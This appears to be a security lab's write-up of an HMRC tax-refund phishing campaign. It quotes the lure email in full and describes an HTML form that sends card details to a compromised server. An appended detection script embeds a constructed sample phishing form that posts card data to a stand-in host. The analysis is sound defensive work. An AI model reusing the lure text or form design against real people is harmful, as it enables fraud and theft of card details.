MX Lab, http://www.mxlab.eu, is intercepting tax refund phishing emails with the subject “Please Submit Your Payment Refund” and an attached HTML webpage. We reported this earlier, on January 27th, 2011, and the campaign is still running in a modified version.
The email is sent from the spoofed address firstname.lastname@example.org (and possibly other combinations) and has the following body:
Following an upgrade of our computer systems and review of our records we have investigated your payments and latest tax returns over the last seven years our calculations show that you have made over payments of GBP 178.25
Due to the high volume of refunds due you must complete the online application, the telephone help line is unable to assist with this application. In oder to process your refund you will need to complete the application form attached to this email.Your refund may take up to 6 weeks to process please make sure you complete the form correctly.
NOTE: If you’ve received an Income Tax ‘repayment’ it will either be following a claim you’ve made or because HM Revenue & Customs (HMRC) has received new information about your taxable income or entitlement to allowances. The refund may come through your tax code or as a payment and could relate to the current tax year or earlier years.
An Income Tax repayment is a refund of tax that you’ve overpaid. So, if you’ve paid too much tax for example through your job or pension this year or in previous years HMRC will send you a repayment. You’ll get the repayment by bank transfer directly to your credit or debit card.
Copyright 2011, HM Revenue Customs UK All rights reserved.
Attached to the email is an HTML page named Refund_Form.htm. Once opened, it presents a web form asking for your personal details together with your credit card details.
Looking at the HTML source code, we find that the layout and images are taken directly from the http://www.hmrc.gov.uk/ web site. The form data itself is posted to hxxp://www.hotel-bergara.com/cgi-bin/mailform.cgi. After submitting the data you are redirected to the genuine HM Revenue & Customs web site. The form's hidden values show that the captured data is emailed to email@example.com.
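A triage script for this kind of attachment, added here as an example and not part of the MX Lab post: it pulls every form action and hidden input out of an HTML file and flags forms that post somewhere other than the brand they impersonate. The sample HTML, the hidden-field names ("recipient", "redirect") and all hostnames in it are constructed for the example.

```python
# Added example (not from the MX Lab post): extract <form> actions and hidden
# inputs from an HTML attachment and flag forms posting to a foreign host.
# Sample HTML, hidden-field names and hostnames are constructed, not real.
from html.parser import HTMLParser
from urllib.parse import urlparse

class FormExtractor(HTMLParser):
    """Collect every form's action plus its hidden <input> name/value pairs."""
    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action", ""), "hidden": {}}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if a.get("type", "").lower() == "hidden":
                self._current["hidden"][a.get("name", "")] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def extract_forms(html):
    p = FormExtractor()
    p.feed(html)
    return p.forms

def suspicious_forms(html, legit_host):
    """Return forms whose action host is not the impersonated brand's host."""
    out = []
    for f in extract_forms(html):
        host = urlparse(f["action"]).hostname or ""
        if host and host != legit_host and not host.endswith("." + legit_host):
            out.append(f)
    return out

# Constructed sample mimicking the Refund_Form.htm structure described above.
SAMPLE = """<html><body><img src="http://www.hmrc.gov.uk/images/logo.gif">
<form method="post" action="http://compromised-host.example/cgi-bin/mailform.cgi">
<input type="hidden" name="recipient" value="dropbox@mailer.example">
<input type="hidden" name="redirect" value="http://www.hmrc.gov.uk/">
<input type="text" name="cardnumber"></form></body></html>"""

if __name__ == "__main__":
    for f in suspicious_forms(SAMPLE, "hmrc.gov.uk"):
        print("form posts to", f["action"], "hidden fields:", f["hidden"])
```

The redirect value pointing back at the genuine site is the same trick the post describes, so a hit on both a foreign action host and a brand-site redirect is a strong signal.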
We also have a second example where the email contains a URL to the phishing web site instead of an embedded attachment.